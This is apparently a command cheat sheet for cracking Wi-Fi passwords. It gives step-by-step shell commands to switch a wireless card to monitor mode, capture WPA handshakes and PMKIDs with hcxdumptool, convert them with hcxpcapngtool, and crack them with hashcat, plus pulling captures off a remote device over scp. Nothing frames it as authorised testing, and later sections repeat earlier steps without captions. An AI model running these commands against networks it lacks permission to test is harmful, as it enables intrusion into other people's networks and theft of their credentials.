scp -r root@172.16.42.1:/root/example.pcapng /home/username/Desktop
📖 Downloads files from remote devices using SCP.
iwconfig
📖 Displays wireless network interface details.
airmon-ng check kill
📖 Stops services that might interfere with wireless tools.
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up
📖 Prepares the wireless card for capture.
hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15
📖 Captures packets from networks.
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
📖 Converts packets for password cracking.
hcxdumptool --do_rcascan -i wlan1
📖 Scans and displays nearby networks.
hashcat -m 22000 hash.hc22000 wordlist.txt
📖 Uses hashcat to attempt password cracks.
sudo apt-get install hcxdumptool hcxtools
iw list
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
sudo iw dev wlan0 set channel 36
sudo hcxdumptool -i wlan0 --scan
sudo hcxdumptool -i wlan0 --enable_status=1 -o output.pcapng --filterlist=filterlist.txt --filtermode=2
hcxpcaptool -z output.hccapx output.pcapng
sudo iw reg get
sudo iw reg set US
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo iw dev wlan0 set channel 6
sudo ip link set wlan0 up
iw phy phy0 channels
iwlist wlan0 channel